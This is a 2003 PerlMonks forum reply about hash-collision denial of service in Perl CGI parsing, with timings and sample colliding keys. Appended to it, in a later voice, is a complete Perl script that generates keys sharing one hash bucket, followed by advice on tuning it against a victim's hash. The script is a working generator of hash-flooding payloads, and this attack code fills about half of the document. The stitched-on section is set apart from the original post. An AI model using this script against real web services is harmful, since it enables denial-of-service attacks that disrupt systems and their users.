PerlMonks  

Re: Re: Re: Re: Re: Re: hash collision DOS

by iburrell (Chaplain)
on Jun 03, 2003 at 00:16 UTC


in reply to Re: Re: Re: Re: Re: hash collision DOS
in thread hash collision DOS

The keys aren't going into a single bucket above. The Vars() is just stripping out the non-parameter keys that CGI.pm stores inside of itself. The 'a', 'b' parameters are there in the object.

The way to determine what is happening inside a hash is evaluating it in scalar context. That gives you the number of buckets being used. tilly wrote a program that uses this feature to generate a list of colliding keys. This algorithm is fast and doesn't depend on reverse engineering the Perl hash algorithm.

I ran some tests on 10,000 keys generated by tilly's method, both inserting them into a hash and parsing the query string with CGI. It takes over 20 seconds to parse the query string in the pathological case versus less than a second for 10,000 normal strings. I haven't been willing to wait long enough to let 100,000 strings run. For a sample, here are the first 10 integers that collide and the scalar hash value showing they all go in one bucket.

8 14 22 30 38 46 54 62 70 78 86 1/8
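The bucket-count oracle described in the post, written out as an added example. This is not tilly's program (which is not reproduced on the page) and not iburrell's test script; it only follows the idea stated above: insert a key, look at how many buckets the hash now uses, and keep the key only if that number did not go up, i.e. it landed in an already-occupied bucket. The key generator ("k1", "k2", ...), the seed key, the table size and the try limit are arbitrary choices for the example. It assumes Perl 5.18 or later, where Hash::Util::bucket_ratio returns the "used/total" string that scalar(%h) returned on the perls discussed in this thread (scalar(%h) was changed to return the key count in 5.26). Since Perl 5.8.1 the hash seed is randomized per process, so the set of colliding keys this finds is only valid for the process that found it unless PERL_HASH_SEED is pinned; the 5.8.1 through 5.16 defence of rehashing an overfull hash with a fresh seed would also defeat the probe, which is why the example targets 5.18+.

```perl
#!/usr/bin/perl
# Added example (not code from the PerlMonks thread): find keys that all share
# one hash bucket using only the "used/total" bucket ratio as an oracle.
# Assumes Perl 5.18+ for Hash::Util::bucket_ratio.
use strict;
use warnings;
use Hash::Util qw(bucket_ratio);

# Number of buckets currently occupied in a "used/total" string.
sub used_part {
    my ($ratio) = @_;
    my ($used) = split m{/}, $ratio;
    return $used;
}

# Return a list of $want keys that share a bucket with $seed_key in a table
# of $table_size buckets. Nothing here depends on the hash function itself;
# the only information used is whether the used-bucket count grew.
sub find_colliding_keys {
    my ($seed_key, $want, $table_size, $max_tries) = @_;
    my %h;
    keys(%h) = $table_size;    # preallocate so the table does not split while probing
    $h{$seed_key} = 1;         # exactly one bucket is in use from here on
    my @found = ($seed_key);
    for my $n (1 .. $max_tries) {
        my $cand = "k$n";      # arbitrary candidate generator for the example
        next if exists $h{$cand};
        $h{$cand} = 1;
        if (used_part(bucket_ratio(%h)) == 1) {
            push @found, $cand;    # still one used bucket: the candidate collided
        } else {
            delete $h{$cand};      # landed in a fresh bucket: discard it
        }
        last if @found >= $want;
    }
    return @found;
}

# Rebuild a fresh table of the same size from the keys and report its ratio,
# so the result can be checked independently of the hash used for probing.
sub verify_one_bucket {
    my ($table_size, @keys) = @_;
    my %v;
    keys(%v) = $table_size;
    $v{$_} = 1 for @keys;
    return bucket_ratio(%v);
}

my $table_size = 64;
my @bad = find_colliding_keys('8', 16, $table_size, 200_000);
print "colliding keys: @bad\n";
print "bucket ratio after reinserting them: ",
      verify_one_bucket($table_size, @bad), "\n";
```

With 64 buckets roughly one candidate in 64 collides, so 16 keys turn up within a couple of thousand tries, and verify_one_bucket should report 1/64. The keys also stay in one bucket as a fresh hash grows from its initial 8 buckets up to 64, because Perl picks the bucket as hash & (size-1) with power-of-two sizes, so keys equal in their low 6 bits are equal in their low 3, 4 and 5 bits too; beyond the probing table size they may spread out, so probe with a table at least as large as the hash you expect the victim to build.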

